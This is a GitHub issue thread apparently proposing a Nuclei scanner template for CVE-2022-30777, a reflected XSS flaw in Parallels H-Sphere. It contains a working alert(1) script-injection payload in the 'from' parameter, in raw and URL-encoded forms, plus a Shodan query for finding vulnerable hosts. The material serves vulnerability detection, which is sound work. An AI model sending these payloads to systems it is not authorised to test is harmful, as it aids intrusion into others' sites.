CVE-2022–30777
3th1cyuk1 opened this issue · comments
Yukesh kumar commented
Template Information:
Cross-site scripting (XSS) vulnerability in sites using outdated H-Sphere hosting allows remote attackers to inject arbitrary web script or HTML via the “from” parameter.
Nuclei Template:
id: CVE-2022-30777
info:
name: Parallels H-Sphere
author: 3th1c_yuk1
severity: medium
reference:
- https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59
requests:
- method: GET
path:
- '{{BaseURL}}/index_en.php?from="><script>alert(1)</script>'
- '{{BaseURL}}/index.php?from="><script>alert(1)</script>'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
- type: word
part: header
words:
- "text/html"
Ritik Chaddha commented
Hello @3th1cyuk1, To prevent getting FP, please update the template request and matcher as shown below. I have verified the template too.
requests:
- method: GET
path:
- '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
- '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '<TITLE>"><script>alert(1)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
Also, update the metadata header:
metadata:
verified: true
shodan-query: title:"h-sphere"
Prince Chaddha commented
Hi @3th1cyuk1, thank you for taking the time to create this issue and contributing to this project 🍻